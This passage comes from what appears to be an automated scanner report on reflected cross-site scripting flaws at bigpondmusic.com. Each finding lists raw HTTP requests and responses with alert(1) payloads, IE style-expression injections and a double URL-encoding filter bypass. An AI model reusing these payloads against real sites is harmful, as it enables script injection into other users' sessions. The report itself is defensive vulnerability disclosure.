Content-Length: 124979


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Nelly - 5.0 Deluxe - BigPond
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/nelly/5-0-deluxe?h=771623980c434d"style="x:expression(alert(1))"f7c0d253232" />
...[SNIP]...

2.103. http://bigpondmusic.com/album/nelly/5-0-deluxe [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nelly/5-0-deluxe

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eeab"style%3d"x%3aexpression(alert(1))"e125ad515ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5eeab"style="x:expression(alert(1))"e125ad515ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/nelly/5-0-deluxe?5eeab"style%3d"x%3aexpression(alert(1))"e125ad515ce=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 124531


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Nelly - 5.0 Deluxe - BigPond
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/nelly/5-0-deluxe?5eeab"style="x:expression(alert(1))"e125ad515ce=1" />
...[SNIP]...

2.104. http://bigpondmusic.com/album/nelly/just-a-dream2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/nelly/just-a-dream2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e7a0'%3b8f38f26f47a was submitted in the REST URL parameter 1. This input was echoed as 5e7a0';8f38f26f47a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album5e7a0'%3b8f38f26f47a/nelly/just-a-dream2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87890


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album5e7a0';8f38f26f47a';
   s.prop4 = 'nelly';
   s.prop5 = 'just-a-dream2';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|'
...[SNIP]...

2.105. http://bigpondmusic.com/album/nelly/just-a-dream2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nelly/just-a-dream2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c1b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee4c93957b71 was submitted in the REST URL parameter 1. This input was echoed as 6c1b8"><script>alert(1)</script>e4c93957b71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album6c1b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee4c93957b71/nelly/just-a-dream2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88200


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album6c1b8"><script>alert(1)</script>e4c93957b71/nelly/just-a-dream2" />
...[SNIP]...

2.106. http://bigpondmusic.com/album/nelly/just-a-dream2 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nelly/just-a-dream2

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa568"style%3d"x%3aexpression(alert(1))"61488da52ac was submitted in the h parameter. This input was echoed as fa568"style="x:expression(alert(1))"61488da52ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/nelly/just-a-dream2?h=726722803fa568"style%3d"x%3aexpression(alert(1))"61488da52ac HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 104044


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Nelly - Just A Dream - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/nelly/just-a-dream2?h=726722803fa568"style="x:expression(alert(1))"61488da52ac" />
...[SNIP]...

2.107. http://bigpondmusic.com/album/nelly/just-a-dream2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nelly/just-a-dream2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba87f"style%3d"x%3aexpression(alert(1))"31c7e4dd0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba87f"style="x:expression(alert(1))"31c7e4dd0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/nelly/just-a-dream2?ba87f"style%3d"x%3aexpression(alert(1))"31c7e4dd0c=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 103886


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Nelly - Just A Dream - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/nelly/just-a-dream2?ba87f"style="x:expression(alert(1))"31c7e4dd0c=1" />
...[SNIP]...

2.108. http://bigpondmusic.com/album/nicole-scherzinger/poison4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/nicole-scherzinger/poison4

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6490e'%3b7485f0ca9f5 was submitted in the REST URL parameter 1. This input was echoed as 6490e';7485f0ca9f5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album6490e'%3b7485f0ca9f5/nicole-scherzinger/poison4 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88121


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album6490e';7485f0ca9f5';
   s.prop4 = 'nicole-scherzinger';
   s.prop5 = 'poison4';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop
...[SNIP]...

2.109. http://bigpondmusic.com/album/nicole-scherzinger/poison4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nicole-scherzinger/poison4

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c62ff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e279f4e1735f was submitted in the REST URL parameter 1. This input was echoed as c62ff"><script>alert(1)</script>279f4e1735f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumc62ff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e279f4e1735f/nicole-scherzinger/poison4 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88450


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumc62ff"><script>alert(1)</script>279f4e1735f/nicole-scherzinger/poison4" />
...[SNIP]...

2.110. http://bigpondmusic.com/album/nicole-scherzinger/poison4 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nicole-scherzinger/poison4

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f969"style%3d"x%3aexpression(alert(1))"18b7bf8d52b was submitted in the h parameter. This input was echoed as 5f969"style="x:expression(alert(1))"18b7bf8d52b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/nicole-scherzinger/poison4?h=7653777365f969"style%3d"x%3aexpression(alert(1))"18b7bf8d52b HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:27:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 99468


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Nicole Scherzinger - Poison
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/nicole-scherzinger/poison4?h=7653777365f969"style="x:expression(alert(1))"18b7bf8d52b" />
...[SNIP]...

2.111. http://bigpondmusic.com/album/nicole-scherzinger/poison4 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nicole-scherzinger/poison4

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4465f"style%3d"x%3aexpression(alert(1))"01d427eeef0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4465f"style="x:expression(alert(1))"01d427eeef0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/nicole-scherzinger/poison4?4465f"style%3d"x%3aexpression(alert(1))"01d427eeef0=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:26:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 99329


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Nicole Scherzinger - Poison
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/nicole-scherzinger/poison4?4465f"style="x:expression(alert(1))"01d427eeef0=1" />
...[SNIP]...

2.112. http://bigpondmusic.com/album/p-nk/greatest-hits-so-far [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/p-nk/greatest-hits-so-far

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3921'%3b1df4e93a53 was submitted in the REST URL parameter 1. This input was echoed as c3921';1df4e93a53 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumc3921'%3b1df4e93a53/p-nk/greatest-hits-so-far HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:20:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87896


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumc3921';1df4e93a53';
   s.prop4 = 'p-nk';
   s.prop5 = 'greatest-hits-so-far';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3
...[SNIP]...

2.113. http://bigpondmusic.com/album/p-nk/greatest-hits-so-far [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/p-nk/greatest-hits-so-far

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ed0f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e50a9fabc3f3 was submitted in the REST URL parameter 1. This input was echoed as 8ed0f"><script>alert(1)</script>50a9fabc3f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album8ed0f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e50a9fabc3f3/p-nk/greatest-hits-so-far HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:20:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88218


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album8ed0f"><script>alert(1)</script>50a9fabc3f3/p-nk/greatest-hits-so-far" />
...[SNIP]...

2.114. http://bigpondmusic.com/album/p-nk/greatest-hits-so-far [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/p-nk/greatest-hits-so-far

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b739"style%3d"x%3aexpression(alert(1))"0516aff5a34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2b739"style="x:expression(alert(1))"0516aff5a34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/p-nk/greatest-hits-so-far?2b739"style%3d"x%3aexpression(alert(1))"0516aff5a34=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
